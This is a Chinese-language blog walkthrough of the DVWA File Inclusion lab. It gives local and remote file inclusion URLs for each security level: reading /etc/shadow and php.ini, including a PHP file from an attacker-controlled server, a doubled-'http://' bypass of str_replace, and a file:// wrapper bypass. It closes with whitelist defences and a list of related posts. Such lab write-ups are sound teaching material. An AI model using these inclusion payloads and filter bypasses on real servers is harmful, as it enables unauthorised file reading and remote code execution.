N5 DVWA File Inclusion(文件包含)

最新推荐文章于 2022-06-27 23:39:38 发布
最新推荐文章于 2022-06-27 23:39:38 发布
阅读量207 收藏
点赞数
分类专栏: DVWA 文章标签: web安全 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40684306/article/details/108054280
版权

一、概念

文件包含指服务器开启allow_url_include选项时。可以通过php的某些特性函数。include()、require()、include_once()、require_once()。利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或任意命令执行。
文件包含漏洞分为:本地文件包含漏洞、远程文件包含漏洞(开启了PHP配置中的allow_url_fopen选项,服务器运行包含一个远程文件)

二、Low级别

1.代码审计
在这里插入图片描述
这里可以看见,对get请求传递的参数直接执行。我们可以在地址栏直接写入命令进行文件包含。
2.本地文件包含读取敏感文件
在这里插入图片描述
我们点击File1,发现直接返回这个文件,链接显示http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=file1.php
我们将file1.php随便修改成一个不存在的名字,发现返回了文件的绝对路径。
在这里插入图片描述

这里给几个比较常见的路径:
http://ip/dvwa/vulnerabilities/fi/page=/etc/shadow //密码文件所在目录Linux系统
http://ip/dvwa/vulnerabilities/fi/page=C:\xampp\htdocs\dvwa\php.ini
http://ip/dvwa/vulnerabilities/fi/page=…\xampp\htdocs\dvwa\php.ini
猴子君是使用Windows server 2008+phpstudy进行搭建的,所以这里猴子君要重新构建一下路径。
首先,我们在服务器C:\路径下创建一个test.txt文件,里面写一段话。
在这里插入图片描述

在这里插入图片描述
然后我们来访问以下的链接
http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=C:\test.txt
在这里插入图片描述
发现成功访问。可以直接对路径内的文件进行读取。
访问DVWA的php.ini配置文件
http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=C:\PHPTutorial\WWW\DVWA-master\php.ini
http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=…\PHPTutorial\WWW\DVWA-master\php.ini
在这里插入图片描述

3.远程文件包含代码注入
通过查看php.ini文件发现allow_url_fopen与allow_url_include开启,服务器允许包含远程服务器上的文件
我们在远程服务器写一个php文件命名为test.php

<?php phpinfo(); ?>

打开kali的apache,将test.php文件导入。

在这里插入图片描述
在这里插入图片描述
我们输入ifconfig,查看kali的ip地址
在这里插入图片描述

构造远程url
http://ip/dvwa/vulnerabilities/fi/page=http://黑客服务器ip/test.php
此处test.php后缀名为任意组合,.txt/.png等都会被尝试执行php,若不是php则直接显示对应内容。
在这里插入图片描述
发现已经成功运行。

三、medium级别

1.代码审计
在这里插入图片描述
$file = str_replace( array( “http://”, “https://” ), “”, $file );
$file = str_replace( array( “…/”, “…”" ), “”, $file );
对’http://’ 、‘https://’ 、’…/’ 、’…\'进行了字符替换,我们只要输入以上字符就会被替换为空,但str_replace函数是不安全的,只会执行一次,则可以双写绕过。

2.本地文件包含
将内容替换为以下字段即可绕过。
http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=…/./…/./…/./…/./…/./…/./…/./…/./…/./PHPTutorial\WWW\DVWA-master\php.ini
在这里插入图片描述

3.远程文件包含
双写http://
hthttp://tp://ip/phpinfo.txt删除了http://即构造成功。
在这里插入图片描述

绕过成功!

四、high级别

1.代码审计
在这里插入图片描述
其中,fnmatch(“字符串”,“变量1”);表示变量内容应为字符串内容,*代表任意,即变量应为file+任意字符
2.本地文件包含:file伪协议绕过
我们在文件包含文件夹创建一个test.txt文件
输入以下路径即可成功查看该文件
http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=file://C:\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi\test.txt

在这里插入图片描述
查看php.ini配置文件
http://192.168.3.133/DVWA-master/vulnerabilities/fi/?page=file://C:\PHPTutorial\WWW\DVWA-master\php.ini
在这里插入图片描述
成功

3.远程文件包含
配合文件上传漏洞利用,上传一个内容为php的文件,再用file协议去包含上传文件,从而实现任意代码执行。

五、impossible级别

1.代码审计
if( $file != “include.php” && $file != “file1.php” && $file != “file2.php” && $file != “file3.php” )
如果不等于上面四个文件则返回error
2.总结
对于需要进行文件展示的服务,我们可以进行白名单验证,只允许访问授权访问的文件,即可将安全性提到最高。

六、防御

1.基于白名单进行防御,确保page参数传递只能是固定的文件名。
2.文件包含与文件上传结合可以直接上传图片文件,执行代码。全面防御。

尐猴子君
关注
专栏目录
DVWA-----------File Inclusion
haha1314的博客
05-19 443
文件包含漏洞 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含; 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞; 常用函数 include():找不到被包含文件,报错,但会继续运行脚本; include_once():...
Dvwa练习04 File Inclusion文件包含
coco3105的博客
02-09 1313
本地文件包含,远程文件包含,文件读取及代码执行
DVWAFile Inclusion
baynk的博客
10-29 880
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...
dvwaFile Inclusion
Alsn86的博客
02-04 752
dvwaFile Inclusion 进行包含的文件名由get方法的page参数传递 看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =
DVWA-File Inclusion
weixin_44866139的博客
02-07 288
文件包含是指应用程序加载的文件(本地/远程)可以由用户提交的数据控制,从而导致攻击者控制恶意文件在服务器上执行. 对于php来说,常见的文件包含函数有如下: require:找不到被包含的文件,报错,并且停止运行脚本。 include:找不到被包含的文件,只会报错,但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...
DVWA系列之14 文件包含漏洞分析
weixin_34284188的博客
11-14 162
程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 PHP中提供了四个文件包含的函数,分别是include...
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1281
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
Kali渗透测试之DVWA系列9——File Inclusion(文件包含)
浅浅的博客
06-14 2927
目录 一、文件包含 二、实验环境 三、实验步骤 Windows 安全等级:LOW 安全等级:Medium 安全等级:High 安全等级:Impossible Linux 安全等级:LOW 安全等级:Medium 安全等级:High 一、文件包含 1、文件包含原理 文件包含:开发人员将相同的函数写入单独的文...
DVWA File Inclusion
部分学习记录
09-22 162
low 查看源码,没有对参数page进行过滤 构造page尝试获取相应信息:http://192.168.56.141/vulnerabilities/fi/?page=1.php 暴出了路径 利用获取到的路径继续构造,尝试获取一些配置信息 http://192.168.56.141/vulnerabilities/fi/?page=C:\phpstudy_pro\WWW\DVWA-master\php.ini 关于的Magic_quote_gpc信息(出自https://www.freebuf.com/a
DVWA文件包含漏洞(File Inclusion
qq_54537919的博客
06-27 1153
DVWA文件包含漏洞(File Inclusion
DVWAFile Inclusion
chtdgf的博客
02-23 143
DVWAFile Inclusion 1.LOW级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器获取 page 的值,没有进行任何过滤。 二 MEDIUM级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file
DVWAFile Inclusion
Sukiugg的博客
07-28 238
1. url改为: http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd
DVWAFile Inclusion
qq_43665434的博客
03-01 207
DVWAFile Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的 于是尝试更改page参数内容 替换为:..\..\..\..\..\..\..\..\password.txt 如图所示,成功爆出根目录下password.txt文件下的内容,此为本地文件包含。 (2)remote 搭建一个站点,写入一个木马文件 将page参数内容替换为木马文件的url地址 加上参数x,传入cmd命令: http://10.245.3.237/dvwa/vulner
DVWA通关之File Inclusion
ZJLE的博客
08-06 209
DVWA通关之File InclusionLow:Medium:High: File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中
DVWA通关 File Inclusion
干铮的博客
08-06 221
文件包含漏洞 File Inclusion 程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中,在使⽤某个函数的时候,直接调⽤此⽂件,⽆需再次编写,这种调⽤⽂件的过程通常称为包含。 程序开发⼈员都希望代码更加灵活,所以会把被包含的⽂件的路径设置为变量,来进⾏动态调⽤,但是正是由于这种灵活性,如果被包含⽂件的路径客户端可控,造成⽂件包含漏洞。 ⼏乎所有的脚步都会提供⽂件包含的功能,⽂件包含漏洞在PHP 的Web 应⽤中居多,在JSP/ASP/ASP.NET 程序中⽐较少。 文件包含的原理 配置文件开启
DVWAFile Inclusion文件包含
weixin_41182861的博客
06-04 236
前言
DVWA-File Inclusion文件包含
Cwillchris的博客
10-28 2330
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
DVWA中的File Inclusion(文件包含)
hwy2506451901的博客
04-04 469
最近课上用到了DVWA,通过学习总结了文件包含部分的内容,以下是个人的总结,因为刚刚入门 所以写的比较详细,希望对刚学习这一部分的朋友们有所帮助。 **原理:**PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 **类型:**本地文件包含,远程文件包含(相对较容易) **提示:**...
DVWA实战测试之File Inclusion
0xdawn的博客
01-08 265
0x01 Low 源码分析 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器端对page参数没有做任何的过滤跟检查。 预期操作是点击下面的三个链接,服务器会包含相应的文件,并将结果返回。 本地包含(LFI) 报出绝对路径 包含根目录下的phpinfo.php 绝对路径:http:...
dvwa file inclusionfile upload
最新发布
05-12
DVWA(Damn Vulnerable Web Application)是一个用于演示Web应用程序安全漏洞的教育性平台。其中包括文件包含File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感文件。攻击者可以通过这种方式获取服务器上的重要信息,甚至能够获取Web应用程序的所有权限。 文件上传漏洞是指Web应用程序未对上传的文件进行充分验证和过滤,导致攻击者能够上传恶意文件并执行任意代码。攻击者可以通过这种方式获取服务器上的敏感信息、修改文件内容,甚至能够控制整个Web应用程序。 在DVWA中,可以通过模拟这两种漏洞,来帮助开发者、安全研究人员和测试人员了解和学习如何发现和修复这些漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尐猴子君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值